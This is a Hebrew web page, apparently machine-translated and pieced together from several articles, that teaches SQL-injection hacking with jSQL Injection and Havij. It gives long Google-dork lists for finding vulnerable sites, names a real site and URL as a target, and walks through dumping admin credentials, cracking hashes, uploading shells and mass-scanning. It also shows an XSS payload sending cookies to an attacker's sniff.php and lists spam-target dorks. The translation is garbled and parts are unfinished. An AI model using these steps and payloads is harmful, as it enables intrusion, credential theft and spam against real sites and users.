הוראות שימוש ב-jSQL Injection, כלי רב תכליתי לאיתור וניצול הזרקות SQL בקאלי לינוקס. הוראות שימוש ב-jSQL Injection - כלי רב תכליתי לחיפוש וניצול הזרקות SQL בקאלי לינוקס

13.10.2023
אז עכשיו אני אגיד לך איך לפרוץ משהו בלי שום ידע מיוחד. אני אגיד מיד שיש מעט תועלת מכך, אבל עדיין.
ראשית, עליך למצוא את האתרים עצמם. כדי לעשות זאת, עבור אל google.com וחפש אחר דורקס

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

הנה רשימה קטנה. אתה יכול להשתמש בשלך. וכך מצאנו את האתר. לדוגמה http://www.vestitambov.ru/
לאחר מכן, הורד את התוכנית הזו

**תוכן מוסתר: כדי לראות את התוכן המוסתר הזה, ספירת הפוסטים שלך חייבת להיות 3 או יותר.**

לחץ על אישור. ואז אנחנו מכניסים את אתר הקורבן.
אנחנו לוחצים על התחל. בשלב הבא נחכה לתוצאות.
וכך, התוכנית מצאה פגיעות של SQL.

לאחר מכן, הורד את Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= הדבק את הקישור שהתקבל שם. אני לא אסביר איך להשתמש ב-Havig והיכן להוריד את זה לא קשה למצוא. את כל. קיבלת את הנתונים שאתה צריך - סיסמת מנהל המערכת, ואז זה תלוי בדמיון שלך.

נ.ב. זה הניסיון הראשון שלי לכתוב משהו. סליחה אם משהו לא בסדר

החלטתי לדבר קצת על אבטחת מידע. המאמר יהיה שימושי עבור מתכנתים מתחילים וכאלה שזה עתה החלו לעסוק בפיתוח Frontend. מה הבעיה?

מפתחים מתחילים רבים נסחפים בכתיבת קוד עד שהם שוכחים לחלוטין מאבטחת העבודה שלהם. והכי חשוב, הם שוכחים מנקודות תורפה כמו שאילתות SQL ו-XXS. הם גם מגיעים עם סיסמאות קלות ללוחות הניהול שלהם והם נתונים לכוח גס. מהן ההתקפות הללו וכיצד ניתן להימנע מהן?

הזרקת SQL

הזרקת SQL היא הסוג הנפוץ ביותר של התקפה על מסד נתונים, שמתבצעת במהלך שאילתת SQL עבור DBMS ספציפי. אנשים רבים ואפילו חברות גדולות סובלים מהתקפות כאלה. הסיבה היא שגיאת מפתח בעת כתיבת מסד הנתונים, ולמען האמת, שאילתות SQL.

התקפת הזרקת SQL אפשרית עקב עיבוד שגוי של נתוני הקלט המשמשים בשאילתות SQL. אם התקפת האקר מצליחה, אתה מסתכן באובדן לא רק את התוכן של מסדי הנתונים, אלא גם סיסמאות ויומני פאנל מנהליים. והנתונים האלה יספיקו לגמרי כדי להשתלט לחלוטין על האתר או לבצע בו התאמות בלתי הפיכות.

ניתן לשחזר את המתקפה בהצלחה בסקריפטים שנכתבו בשפות PHP, ASP, Perl ושפות נוספות. ההצלחה של התקפות כאלה תלויה יותר באיזה DBMS נעשה שימוש ובאופן יישום הסקריפט עצמו. ישנם אתרים פגיעים רבים להזרקת SQL בעולם. קל לאמת זאת. פשוט הזן "dorks" - אלו שאילתות מיוחדות לחיפוש אתרים פגיעים. הנה כמה מהם:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

איך להשתמש בהם? פשוט הזן אותם במנוע חיפוש של גוגל או Yandex. מנוע החיפוש ייתן לך לא רק אתר פגיע, אלא גם דף על הפגיעות הזו. אבל לא נעצור שם ונוודא שהדף באמת פגיע. כדי לעשות זאת, מספיק לשים ציטוט בודד "' אחרי הערך "id=1". משהו כזה:

  • inurl:games.php?id=1'

והאתר ייתן לנו שגיאה לגבי שאילתת SQL. מה ההאקר שלנו צריך אחר כך?

ואז הוא צריך את הקישור הזה לדף השגיאה. לאחר מכן, העבודה על הפגיעות ברוב המקרים מתבצעת בהפצת "Kali linux" עם כלי השירות שלה לחלק זה: הכנסת קוד הזרקה וביצוע הפעולות הדרושות. איך זה יקרה, אני לא יכול להגיד לך. אבל אתה יכול למצוא מידע על זה באינטרנט.

מתקפת XSS

סוג זה של התקפה מתבצע על קבצי Cookies. משתמשים, בתורם, אוהבים לשמור אותם. למה לא? מה היינו עושים בלעדיהם? אחרי הכל, הודות לעוגיות, אנחנו לא צריכים להזין את הסיסמה עבור Vk.com או Mail.ru מאה פעמים. ויש מעטים שמסרבים להם. אבל באינטרנט, לעתים קרובות מופיע כלל עבור האקרים: מקדם הנוחות עומד ביחס ישר למקדם חוסר הביטחון.

כדי ליישם מתקפת XSS, ההאקר שלנו צריך ידע ב-JavaScript. במבט ראשון, השפה פשוטה מאוד ולא מזיקה, מכיוון שאין לה גישה למשאבי מחשב. האקר יכול לעבוד רק עם JavaScript בדפדפן, אבל זה מספיק. אחרי הכל, העיקר הוא להזין את הקוד לדף האינטרנט.

לא אדבר בפירוט על תהליך ההתקפה. אני אגיד לך רק את היסודות והמשמעות של איך זה קורה.

האקר יכול להוסיף קוד JS לפורום או ספר אורחים כלשהו:

document.location.href =”http://192.168.1.7/sniff.php?test”

הסקריפטים יפנו אותנו לעמוד הנגוע, שם יבוצע הקוד: בין אם זה סניפר, סוג של אחסון או ניצול, שאיכשהו יגנוב את העוגיות שלנו מהמטמון.

למה JavaScript? מכיוון ש-JavaScript מעולה בטיפול בבקשות אינטרנט ויש לו גישה לעוגיות. אבל אם הסקריפט שלנו לוקח אותנו לאתר כלשהו, ​​המשתמש ישים לב לכך בקלות. כאן ההאקר משתמש באפשרות ערמומית יותר - הוא פשוט מזין את הקוד לתמונה.

Img=תמונה חדשה();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

אנחנו פשוט יוצרים תמונה ומקצים לה את הסקריפט שלנו ככתובת.

איך להגן על עצמך מכל זה? זה מאוד פשוט - אל תלחץ על קישורים חשודים.

התקפות DoS ו-DDos

DoS (מתוך ה-Dial of Service האנגלית - מניעת שירות) היא התקפת האקרים על מערכת מחשב במטרה לגרום לה להיכשל. זוהי יצירת התנאים שבהם משתמשי מערכת בתום לב אינם יכולים לגשת למשאבי המערכת שסופקו (שרתים), או שגישה זו קשה. תקלה במערכת יכולה גם להיות צעד לקראת השתלטותה אם, במצב חירום, התוכנה מייצרת מידע קריטי כלשהו: למשל, גרסה, חלק מקוד תוכנה וכו'. אבל לרוב זהו מדד ללחץ כלכלי: אובדן שירות פשוט שמייצר הכנסה. חשבונות מהספק או אמצעים למניעת התקפה פוגעים באופן משמעותי ב"מטרה" בכיס. נכון לעכשיו, התקפות DoS ו-DDoS הן הפופולריות ביותר, שכן הן מאפשרות כמעט לכל מערכת להיכשל מבלי להשאיר ראיות משמעותיות מבחינה משפטית.

מה ההבדל בין התקפת DoS ו-DDos?

DoS היא התקפה שתוכננה בצורה חכמה. לדוגמה, אם השרת לא בודק את תקינותן של מנות נכנסות, אז האקר יכול להגיש בקשה שייקח לנצח לעיבוד, ולא יהיה מספיק זמן מעבד לעבוד עם חיבורים אחרים. לפיכך, ימנע מהלקוחות שירות. אבל לא ניתן יהיה להעמיס או להשבית אתרים גדולים ומוכרים בדרך זו. הם חמושים בערוצים רחבים למדי ובשרתים סופר חזקים שיכולים להתמודד עם עומס יתר כזה ללא בעיות.

DDoS היא למעשה אותה התקפה כמו DoS. אבל אם ב-DoS יש חבילת בקשה אחת, אז ב-DDoS יכולים להיות מאות או יותר מהם. אולי אפילו שרתים סופר חזקים לא יוכלו להתמודד עם עומס יתר כזה. תן לי לתת לך דוגמה.

התקפת DoS היא כאשר אתה מנהל שיחה עם מישהו, אבל אז איזה אדם לא מנומס ניגש ומתחיל לצעוק בקול רם. זה בלתי אפשרי או קשה מאוד לדבר. פתרון: התקשר לאבטחה, אשר ירגיע ויוציא את האדם מהמקום. התקפות DDoS הן כאשר קהל של אלפי אנשים לא מנומסים כאלה ממהרים פנימה. במקרה זה, האבטחה לא תוכל לקשור את כולם ולקחת אותם.

DoS ו-DDoS מתבצעים ממחשבים, מה שנקרא זומבים. מדובר במחשבים של משתמשים שנפרצו על ידי האקרים שאפילו לא חושדים שהמכונה שלהם משתתפת במתקפה על שרת כלשהו.

איך להגן על עצמך מפני זה? באופן כללי, אין מצב. אבל אתה יכול להקשות על האקר. כדי לעשות זאת, אתה צריך לבחור אירוח טוב עם שרתים חזקים.

התקפה בכוח אלים

מפתח יכול להמציא הרבה מערכות הגנה מפני תקיפה, לעיין במלואו בסקריפטים שכתבנו, לבדוק באתר פרצות וכו'. אבל כשהוא מגיע לשלב האחרון של פריסת האתר, כלומר כשהוא פשוט מגדיר סיסמה לפאנל הניהול, הוא עלול לשכוח דבר אחד. סיסמה!

בהחלט לא מומלץ להגדיר סיסמה פשוטה. זה יכול להיות 12345, 1114457, vasya111 וכו'. לא מומלץ להגדיר סיסמאות באורך של פחות מ-10-11 תווים. אחרת, אתה עלול להיות נתון למתקפה הנפוצה והלא מסובכת ביותר - Brute Force.

Brute Force הוא מתקפת חיפוש סיסמאות במילון באמצעות תוכנות מיוחדות. מילונים יכולים להיות שונים: לטינית, ספירה לפי מספרים, נניח, עד טווח מסוים, מעורב (לטינית + מספרים), ויש אפילו מילונים עם תווים ייחודיים @#4$%&*~~`’”\ ? וכו '

כמובן שקל להימנע מהתקפות מהסוג הזה. כל מה שאתה צריך לעשות הוא להמציא סיסמה מורכבת. אפילו קפצ'ה יכול להציל אותך. כמו כן, אם האתר שלך נוצר ב-CMS, אז רבים מהם מזהים סוג זה של התקפה וחוסמים את ה-IP. עליך לזכור תמיד שככל שיש יותר תווים שונים בסיסמה, כך קשה יותר לנחש אותה.

איך האקרים עובדים? ברוב המקרים, הם חושדים או יודעים חלק מהסיסמה מראש. זה די הגיוני להניח שהסיסמה של המשתמש בוודאי לא תהיה מורכבת מ-3 או 5 תווים. סיסמאות כאלה מובילות לפריצה תכופה. בעיקרון, האקרים לוקחים טווח של 5 עד 10 תווים ומוסיפים מספר תווים שהם עשויים לדעת מראש. לאחר מכן, נוצרות סיסמאות עם הטווחים הנדרשים. להפצת Kali Linux יש אפילו תוכניות למקרים כאלה. והרי, ההתקפה כבר לא תימשך זמן רב, שכן נפח המילון כבר לא כל כך גדול. בנוסף, האקר יכול להשתמש בכוחו של כרטיס המסך. חלקם תומכים במערכת CUDA, ומהירות החיפוש עולה פי 10. ועכשיו אנחנו רואים שמתקפה בצורה כל כך פשוטה היא די אמיתית. אבל לא רק אתרים נתונים לכוח גס.

מפתחים יקרים, לעולם אל תשכחו את מערכת אבטחת המידע, כי כיום אנשים רבים, כולל מדינות, סובלים מסוגי התקפות כאלה. אחרי הכל, הפגיעות הכי גדולה היא אדם שתמיד יכול להסיח את דעתו איפשהו או לפספס משהו. אנחנו מתכנתים, אבל לא מכונות מתוכנתות. היו תמיד על המשמר, כי לאובדן מידע עלולות להיות השלכות חמורות!

כיצד לחפש נכון באמצעות google.com

כולם בטח יודעים איך להשתמש במנוע חיפוש כמו גוגל =) אבל לא כולם יודעים שאם מרכיבים נכון שאילתת חיפוש באמצעות קונסטרוקציות מיוחדות, אפשר להגיע לתוצאות של מה שאתה מחפש בצורה הרבה יותר יעילה ומהירה =) במאמר זה אני אנסה להראות את זה ומה אתה צריך לעשות כדי לחפש נכון

Google תומכת במספר אופרטורים של חיפוש מתקדם שיש להם משמעות מיוחדת בעת חיפוש ב-google.com. בדרך כלל, הצהרות אלו משנות את החיפוש, או אפילו אומרות לגוגל לבצע סוגים שונים לחלוטין של חיפושים. לדוגמה, הקישור: construct הוא אופרטור מיוחד, והבקשה קישור:www.google.comלא ייתן לך חיפוש רגיל, אלא ימצא את כל דפי האינטרנט שיש להם קישורים אל google.com.
סוגי בקשות חלופיים

מטמון: אם תכלול מילים אחרות בשאילתה, Google תדגיש את המילים הנכללות במסמך השמור.
לדוגמה, מטמון:www.websiteיציג את התוכן השמור עם המילה "אינטרנט" מודגשת.

קישור: שאילתת החיפוש למעלה תציג דפי אינטרנט המכילים קישורים לשאילתה שצוינה.
לדוגמה: קישור: www.siteיציג את כל הדפים שיש להם קישור אל http://www.site

קשור: מציג דפי אינטרנט "קשורים" לדף האינטרנט שצוין.
לדוגמה, קשור: www.google.comיפרט דפי אינטרנט הדומים לדף הבית של גוגל.

info: בקש מידע: יציג חלק מהמידע שיש ל-Google על דף האינטרנט שאתה מבקש.
לדוגמה, מידע: אתר אינטרנטיציג מידע על הפורום שלנו =) (Armada - פורום מנהלי אתרים למבוגרים).

בקשות מידע אחרות

define: השאילתה define: תספק הגדרה של המילים שתזין אחריה, שנאספו ממקורות מקוונים שונים. ההגדרה תהיה עבור כל הביטוי שהוזן (כלומר, היא תכלול את כל המילים בשאילתה המדויקת).

מניות: אם אתה מתחיל שאילתה עם מניות: גוגל תעבד את שאר תנאי השאילתה כסמלים של מניות, ותקשר לדף המציג מידע מוכן עבור סמלים אלה.
לדוגמה, מניות: אינטל יאהויציג מידע על אינטל ויאהו. (שים לב שאתה צריך להקליד סמלי חדשות מתקדמות, לא את שם החברה)

משנה שאילתות

site: אם תכלול site: בשאילתה שלך, Google תגביל את התוצאות לאותם אתרים שהיא מוצאת בדומיין זה.
אתה יכול גם לחפש לפי אזורים בודדים, כגון ru, org, com וכו' ( site:com site:ru)

allintitle: אם אתה מפעיל שאילתה עם allintitle:, Google יגביל את התוצאות לכל מילות השאילתה בכותרת.
לדוגמה, allintitle: חיפוש בגוגליחזיר את כל דפי גוגל על ​​ידי חיפוש כגון תמונות, בלוג וכו'

intitle: אם תכלול את intitle: בשאילתה שלך, Google תגביל את התוצאות למסמכים המכילים את המילה הזו בכותרת.
לדוגמה, intitle: עסקים

allinurl: אם אתה מפעיל שאילתה עם allinurl: גוגל יגביל את התוצאות לכל מילות השאילתה בכתובת האתר.
לדוגמה, allinurl: חיפוש בגוגליחזיר מסמכים עם גוגל ויחפש בכותרת. כמו כן, כאופציה, אתה יכול להפריד מילים עם קו נטוי (/) ואז יחפשו מילים משני צידי הלוכסן באותו עמוד: דוגמה allinurl: foo/bar

inurl: אם תכלול inurl: בשאילתה שלך, Google תגביל את התוצאות למסמכים המכילים את המילה הזו בכתובת האתר.
לדוגמה, אנימציה inurl:site

intext: מחפש רק את המילה שצוינה בטקסט הדף, תוך התעלמות מהטקסטים של הכותרת והקישור, ודברים אחרים שאינם קשורים אליהם. יש גם נגזרת של השינוי הזה - allintext: כלומר. יתרה מכך, כל המילים בשאילתה יחפשו רק בטקסט, וזה גם יכול להיות חשוב, תוך התעלמות ממילים בשימוש תכוף בקישורים
לדוגמה, intext:פורום

טווח זמן: חיפוש בתוך מסגרת זמן (טווח תאריך: 2452389-2452389), תאריכי זמנים הם בפורמט ג'וליאני.

ובכן, ועוד כל מיני דוגמאות מעניינות של שאילתות

דוגמאות לכתיבת שאילתות עבור גוגל. עבור שולחי דואר זבל

Inurl:control.guest?a=sign

אתר:books.dreambook.com "כתובת אתר של דף הבית" "חתום שלי" inurl:sign

אתר: www.freegb.net דף הבית

Inurl:sign.asp "ספירת תווים"

"הודעה:" inurl:sign.cfm "שולח:"

Inurl:register.php "רישום משתמש" "אתר"

Inurl:edu/book guestbook "חתום על ספר האורחים"

Inurl:post "פוסט תגובה" "URL"

Inurl:/archives/ "תגובות:" "זוכר מידע?"

"תסריט וספר אורחים נוצר על ידי:" "URL:" "תגובות:"

Inurl:?action=add "phpBook" "URL"

כותרת: "שלח סיפור חדש"

כתבי עת

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatestjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "ספר אורחים"

בלוגים

Inurl:blogger.com/comment.g?”postID””anonymous”

Inurl:typepad.com/ "פרסם תגובה" "זוכר מידע אישי?"

Inurl:greatestjournal.com/community/ "פרסם תגובה" "כתובות של פוסטרים אנונימיים"

"פרסם תגובה" "כתובות של פוסטרים אנונימיים" -

כותרת: "פרסם תגובה"

Inurl:pirillo.com "פרסם תגובה"

פורומים

Inurl:gate.html?”name=Forums” “mode=reply”

Inurl:”forum/posting.php?mode=reply”

Inurl:"mes.php?"

Inurl:"members.html"

Inurl:forum/memberlist.php?"

הפעל את הקובץ שהורד על ידי לחיצה כפולה (אתה צריך מכונה וירטואלית).

3. אנונימיות בעת בדיקת אתר עבור הזרקת SQL
הגדרת Tor ו-Privoxy בקאלי לינוקס

[חלק בפיתוח]

הגדרת Tor ו-Privoxy ב-Windows

[חלק בפיתוח]

הגדרות פרוקסי ב-jSQL Injection

[חלק בפיתוח]

4. בדיקת האתר להזרקת SQL עם הזרקת jSQL

העבודה עם התוכנית פשוטה ביותר. פשוט הזן את כתובת האתר והקש ENTER.

צילום המסך הבא מראה שהאתר פגיע לשלושה סוגים של הזרקות SQL (מידע עליהן מצוין בפינה הימנית התחתונה). על ידי לחיצה על שמות ההזרקות ניתן לשנות את השיטה בה נעשה שימוש:

כמו כן, מסדי הנתונים הקיימים כבר הוצגו בפנינו.

אתה יכול לראות את התוכן של כל טבלה:

בדרך כלל, הדבר המעניין ביותר בטבלאות הוא אישורי המנהל.

אם התמזל מזלכם ואתם מוצאים את הנתונים של המנהל, אז זה מוקדם מדי לשמוח. אתה עדיין צריך למצוא את לוח הניהול שבו להזין את הנתונים האלה.

5. חפש פאנלים של ניהול עם jSQL Injection

כדי לעשות זאת, עבור ללשונית הבאה. כאן אנו מתקבלים עם רשימה של כתובות אפשריות. אתה יכול לבחור עמוד אחד או יותר לבדיקה:

הנוחות טמונה בעובדה שאינך צריך להשתמש בתוכנות אחרות.

למרבה הצער, אין הרבה מתכנתים רשלניים ששומרים סיסמאות בטקסט ברור. לעתים קרובות למדי בשורת הסיסמה אנו רואים משהו כמו

8743b52063cd84097a65d1633f5c74f5

זהו חשיש. אתה יכול לפענח אותו באמצעות כוח גס. ו... ל-jSQL Injection יש כוח גס מובנה.

6. גיבוב של כוח גס באמצעות הזרקת jSQL

הנוחות ללא ספק היא שאתה לא צריך לחפש תוכניות אחרות. יש תמיכה ברבים מה-hash הפופולריים ביותר.

זו לא האפשרות הטובה ביותר. על מנת להפוך לגורו בפענוח חשיש, הספר "" ברוסית מומלץ.

אבל, כמובן, כשאין תוכנית אחרת בהישג יד או שאין זמן ללמוד, הזרקת jSQL עם פונקציית ה-Brute Force המובנית שלה תהיה שימושית מאוד.

ישנן הגדרות: ניתן להגדיר אילו תווים כלולים בסיסמה, טווח אורך הסיסמה.

7. פעולות קובץ לאחר זיהוי הזרקות SQL

בנוסף לפעולות עם מסדי נתונים - קריאה ושינוי שלהם, אם מתגלות הזרקות SQL, ניתן לבצע את פעולות הקבצים הבאות:

  • קריאת קבצים בשרת
  • העלאת קבצים חדשים לשרת
  • העלאת קונכיות לשרת

וכל זה מיושם ב-jSQL Injection!

יש הגבלות - שרת SQL חייב להיות בעל הרשאות קבצים. מנהלי מערכת חכמות משביתים אותם ולא יוכלו לקבל גישה למערכת הקבצים.

נוכחותן של הרשאות קובץ די פשוט לבדוק. עבור לאחת הכרטיסיות (קריאת קבצים, יצירת מעטפת, העלאת קובץ חדש) ונסה לבצע אחת מהפעולות שצוינו.

עוד הערה חשובה מאוד - אנחנו צריכים לדעת את הנתיב המוחלט המדויק לקובץ איתו נעבוד - אחרת שום דבר לא יעבוד.

תסתכל על צילום המסך הבא:

לכל ניסיון לפעול על קובץ, עונים לנו: ללא הרשאות FILE (ללא הרשאות קובץ). ואי אפשר לעשות פה כלום.

אם במקום זאת יש לך שגיאה נוספת:

בעיה בכתיבה אל [שם_ספרייה]

המשמעות היא שציינת באופן שגוי את הנתיב המוחלט שבו ברצונך לכתוב את הקובץ.

כדי לנחש נתיב מוחלט, עליך לדעת לפחות את מערכת ההפעלה עליה השרת פועל. כדי לעשות זאת, עבור ללשונית רשת.

ערך זה (שורת Win64) נותן לנו סיבה להניח שיש לנו עסק עם מערכת ההפעלה Windows:

Keep-Alive: timeout=5, max=99 שרת: Apache/2.4.17 (Win64) PHP/7.0.0RC6 חיבור: שיטה Keep-Alive: HTTP/1.1 200 אישור אורך תוכן: 353 תאריך: שישי, 11 בדצמבר 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; charset=UTF-8

הנה יש לנו כמה יוניקס (*BSD, לינוקס):

קידוד העברה: חתוך תאריך: שישי, 11 בדצמבר 2015 11:57:02 GMT שיטה: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 חיבור: keep-alive Content-Type: text/html X- Powered-By: PHP/5.3.29 שרת: Apache/2.2.31 (Unix)

והנה יש לנו CentOS:

שיטה: HTTP/1.1 200 אישור תוקף: יום ה', 19 בנובמבר 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ חיבור: keep-alive X-Cache-Lookup: MISS מ-t1.hoster.ru:6666 שרת: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS מ- t1.hoster.ru Cache-Control: ללא חנות, ללא מטמון, חייב לאמת מחדש, post-check=0, pre-check=0 פרגמה: ללא מטמון תאריך: שישי, 11 בדצמבר 2015 12:08:54 GMT העברה-קידוד: קטע תוכן-סוג: text/html; charset=WINDOWS-1251

ב-Windows, תיקייה טיפוסית לאתרים היא C:\Server\data\htdocs\ . אבל, למעשה, אם מישהו "חשב" ליצור שרת ב-Windows, אז, סביר מאוד, אדם זה לא שמע שום דבר על הרשאות. לכן, עליך להתחיל לנסות ישירות מהספרייה C:/Windows/:

כפי שאתה יכול לראות, הכל הלך בסדר בפעם הראשונה.

אבל פגזי הזרקת ה-jSQL עצמם מעוררים ספקות במוחי. אם יש לך הרשאות קובץ, אז אתה יכול בקלות להעלות משהו עם ממשק אינטרנט.

8. בדיקה בכמות גדולה של אתרים להזרקות SQL

ואפילו הפונקציה הזו זמינה ב-jSQL Injection. הכל פשוט ביותר - הורידו רשימה של אתרים (ניתן לייבא מקובץ), בחרו את אלו שברצונכם לבדוק ולחצו על הכפתור המתאים כדי להתחיל את הפעולה.

מסקנה מהזרקת jSQL

jSQL Injection הוא כלי טוב ורב עוצמה לחיפוש ולאחר מכן שימוש בהזרקות SQL שנמצאות באתרי אינטרנט. היתרונות שלו ללא ספק: קלות שימוש, פונקציות קשורות מובנות. הזרקת jSQL יכולה להיות החבר הכי טוב של מתחילים בעת ניתוח אתרים.

בין החסרונות, אציין את חוסר האפשרות לערוך מסדי נתונים (לפחות לא מצאתי את הפונקציונליות הזו). כמו בכל כלי GUI, אחד החסרונות של תוכנית זו ניתן לייחס לחוסר היכולת שלה להשתמש בסקריפטים. עם זאת, אוטומציה מסוימת אפשרית גם בתוכנית זו - הודות לפונקציה המובנית של סריקת אתרים המונית.

תוכנית הזרקת jSQL הרבה יותר נוחה לשימוש מאשר sqlmap. אבל sqlmap תומך ביותר סוגים של הזרקות SQL, יש אפשרויות לעבודה עם חומות אש של קבצים ועוד כמה פונקציות.

בשורה התחתונה: jSQL Injection הוא החבר הכי טוב של האקר מתחיל.

ניתן למצוא עזרה עבור תוכנית זו באנציקלופדיית קאלי לינוקס בדף זה: http://kali.tools/?p=706